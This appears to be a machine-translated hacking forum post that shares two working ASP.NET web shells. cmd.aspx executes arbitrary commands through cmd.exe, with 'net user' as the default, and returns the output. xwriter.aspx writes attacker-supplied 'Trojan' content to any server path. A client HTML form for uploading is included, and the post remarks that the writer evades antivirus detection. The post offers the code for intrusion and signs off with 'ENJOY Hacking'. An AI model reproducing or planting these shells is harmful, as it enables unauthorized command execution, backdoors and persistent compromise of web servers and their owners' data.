Two useful asp.net applet

Asp.net| Program

　　First, cmd.aspx

In the Evil Octal forum (PS: Who knows why in the last few days this forum can not open AH) have friends to carry out WebAdmin command cannot take parameters of the problem, I found a BT host to try, there is a problem, the previous that cmd.aspx changed, please make do with the first. The next version of WebAdmin 2.X will fix the problem.

Save the code copy as an. aspx file:

<%@ Page language= "VB" debug= "true"%><%@ import namespace= "System. IO "%><%@ import namespace=" System.Diagnostics "%><script runat=" Server ">

Sub Runcmd (Src as Object, E as EventArgs)

Dim myprocess as New Process ()

Dim Myprocessstartinfo as New ProcessStartInfo (XPath. Text) Myprocessstartinfo.useshellexecute = False Myprocessstartinfo.redirectstandardoutput = True

Myprocess.startinfo = Myprocessstartinfo

Myprocessstartinfo.arguments=xcmd.text

Myprocess.start ()

Dim Mystreamreader as StreamReader = Myprocess.standardoutput

Dim myString as String = Mystreamreader.readtoend ()

Myprocess.close ()

Mystring=replace (mystring, "<", "<")

Mystring=replace (mystring, ">", ">")

result.text= vbCrLf & "<pre>" & mystring & "</pre>"

End Sub

</script>

<title>asp.net Shell for webadmin2.x final</title>

<meta http-equiv= "Content-type" content= "text/html; charset=gb2312 "/>

<body>

<form runat= "Server" >

<asp:label id= "l_p" style= "COLOR: #0000ff" runat= "Server" width= "80px" >Program</asp:Label>

<asp:textbox id= "XPath" style= "Border-right: #084b8e 1px solid; Border-top: #084b8e 1px solid; Border-left: #084b8e 1px solid; Border-bottom: #084b8e 1px solid "runat=" Server "width=" 300px ">c:\windows\system32\cmd.exe</asp:TextBox>

<br/>

<asp:label id= "l_a" style= "COLOR: #0000ff" runat= "Server" width= "80px" >Arguments</asp:Label>

<asp:textbox id= "Xcmd" style= "Border-right: #084b8e 1px solid; Border-top: #084b8e 1px solid; Border-left: #084b8e 1px solid; Border-bottom: #084b8e 1px solid "runat=" Server "width=" 300px "text="/C net user ">/c net user</asp:textbox>

<br/>

<asp:button id= "button" style= "Border-right: #084b8e 1px solid; Border-top: #084b8e 1px solid; Border-left: #084b8e 1px solid; COLOR: #ffffff; Border-bottom: #084b8e 1px solid; Background-color: #719bc5 "runat=" Server "width=" 100px "text=" Run "></asp:Button>

<p>

<asp:label id= "Result" style= "COLOR: #0000ff" runat= "Server" ></asp:Label>

</p>

</form>

</body>

　　Second, xwriter.aspx

Remember that there is an ASP under the pony is the use of FSO to submit the text information saved as a file, although the volume is larger than the eval but the code is completely legitimate, anti-virus software will not pick fault. Oh, the following code is to implement this function in ASP.net (take to change yourself can also insert aspx file OH):

<%@ Page language= "VB"%>

<%@ Import namespace= "System.IO"%>

<script runat= "Server" >

Sub Page_Load (sender as Object, E as EventArgs)

Dim mywrite As New StreamWriter (Request.Form ("path"), True, Encoding.default) Mywrite.write (Request.Form ("content")

Mywrite.close

Response.Write ("done!") End Sub

</script>

The following is the client, copied down and saved as an HTM file:

<! DOCTYPE HTML PUBLIC "-//w3c//dtd HTML 4.01 transitional//en" "HTTP://WWW.W3.ORG/TR/HTML4/LOOSE.DTD" >

<meta http-equiv= "Content-type" content= "text/html; charset=gb2312 ">

<title>xwriter.net by lake2</title>

<body>

<form name= "Form1" method= "POST" >

<div align= "Center" >url:

<input name= "url" type= "text" value= "http://www.xxx.com/a.aspx" size= ">"

<br>

Path:

<input name= "path" type= "text" id= "path" value= "E:\myweb\myown\a.txt" size= ">"

<br>

<textarea name=content cols=120 rows=10 id= "content" width=45> fill in the contents of the Trojan, preferably full English </textarea>

<BR>

<center>

<br>

<input Type=submit value= Submit >

<br>

ENJOY Hacking!!!!!! </div>

</body>

<script language= "JavaScript" >

function Twosubmit (Form1) {

var url = document.form1.url.value;

Form1.action=url;

Form1.submit ();

}

</script>